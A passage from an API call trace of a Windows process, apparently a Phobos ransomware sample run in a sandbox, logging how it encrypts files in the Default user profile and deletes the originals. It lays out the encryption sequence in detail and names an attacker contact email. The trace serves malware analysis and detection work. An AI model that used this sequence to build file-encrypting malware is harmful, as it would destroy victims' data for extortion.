(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd")) returned 1 [0202.578] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.580] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10191) returned 1 [0202.580] CloseHandle (hObject=0xfc) returned 1 [0202.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml")) returned 0x2020 [0202.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.581] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.581] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.622] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.622] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.622] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x27cf, lpOverlapped=0x0) returned 1 [0202.731] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x27d0, dwBufLen=0x27d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x27d0) returned 1 [0202.732] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x27d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x27d0, lpOverlapped=0x0) returned 1 [0202.773] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.773] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.773] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.773] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.773] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.773] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.773] CloseHandle (hObject=0xfc) returned 1 [0202.773] CloseHandle (hObject=0x160) returned 1 [0202.773] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml")) returned 1 [0202.774] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.776] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=274) returned 1 [0202.776] CloseHandle (hObject=0x160) returned 1 [0202.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini")) returned 0x2026 [0202.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.776] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.776] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.777] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.777] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.777] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x112, lpOverlapped=0x0) returned 1 [0202.778] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0202.778] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0202.778] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.778] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.778] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.778] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.778] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.779] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.779] CloseHandle (hObject=0x160) returned 1 [0202.779] CloseHandle (hObject=0xfc) returned 1 [0202.779] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini")) returned 1 [0202.799] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.800] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=432) returned 1 [0202.800] CloseHandle (hObject=0xfc) returned 1 [0202.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini")) returned 0x26 [0202.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.800] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.800] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.874] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.874] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1b0, lpOverlapped=0x0) returned 1 [0202.875] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c0) returned 1 [0202.875] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1c0, lpOverlapped=0x0) returned 1 [0202.876] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.876] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.876] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.876] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.876] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.877] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.877] CloseHandle (hObject=0xfc) returned 1 [0202.877] CloseHandle (hObject=0x160) returned 1 [0202.877] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini")) returned 1 [0202.878] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.879] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=558) returned 1 [0202.879] CloseHandle (hObject=0x160) returned 1 [0202.879] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini")) returned 0x2026 [0202.879] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.879] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.879] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.880] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.880] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.880] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x22e, lpOverlapped=0x0) returned 1 [0202.881] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x230, dwBufLen=0x230 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x230) returned 1 [0202.881] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x230, lpOverlapped=0x0) returned 1 [0202.881] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.881] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.881] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.881] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.882] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.882] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.882] CloseHandle (hObject=0x160) returned 1 [0202.882] CloseHandle (hObject=0xfc) returned 1 [0202.882] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop.ini")) returned 1 [0202.883] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.909] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=174) returned 1 [0202.909] CloseHandle (hObject=0xfc) returned 1 [0202.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini")) returned 0x26 [0202.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.909] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.909] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.910] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.910] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xae, lpOverlapped=0x0) returned 1 [0202.911] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0202.911] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0202.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.912] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.912] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.912] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.912] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.912] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.912] CloseHandle (hObject=0xfc) returned 1 [0202.912] CloseHandle (hObject=0x160) returned 1 [0202.912] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\desktop.ini")) returned 1 [0202.913] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.914] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=704) returned 1 [0202.914] CloseHandle (hObject=0x160) returned 1 [0202.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini")) returned 0x26 [0202.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.914] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.914] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, 